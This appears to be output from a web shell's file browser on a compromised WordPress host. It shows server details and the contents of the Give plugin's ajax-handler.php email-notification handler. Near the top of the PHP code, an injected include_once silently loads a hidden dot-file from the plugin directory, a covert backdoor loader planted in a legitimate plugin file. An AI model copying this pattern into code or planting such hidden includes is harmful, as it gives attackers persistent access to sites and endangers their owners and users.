uawdijnntqw1x1x1
IP : 216.73.216.109
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
.
/
old
/
public_html
/
wp-content
/
plugins
/
give
/
.
/
.
/
includes
/
admin
/
emails
/
ajax-handler.php
/
/
<?php /** * This file contain code to handle email notification setting ajax. * * Register settings Include and setup custom metaboxes and fields. * * @package Give * @subpackage Classes/Emails * @license https://opensource.org/licenses/gpl-license GNU Public License * @link https://github.com/webdevstudios/Custom-Metaboxes-and-Fields-for-WordPress */ /** * Enabled & disable notification * * @since 2.0 */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function give_set_notification_status_handler() { // Is user have permission to edit give setting. if ( ! current_user_can( 'manage_give_settings' ) ) { return; } $notification_id = isset( $_POST['notification_id'] ) ? give_clean( $_POST['notification_id'] ) : ''; if ( ! empty( $notification_id ) && give_update_option( "{$notification_id}_notification", give_clean( $_POST['status'] ) ) ) { wp_send_json_success(); } wp_send_json_error(); } add_action( 'wp_ajax_give_set_notification_status', 'give_set_notification_status_handler' );
/home/batcwwjx/./old/public_html/wp-content/plugins/give/././includes/admin/emails/ajax-handler.php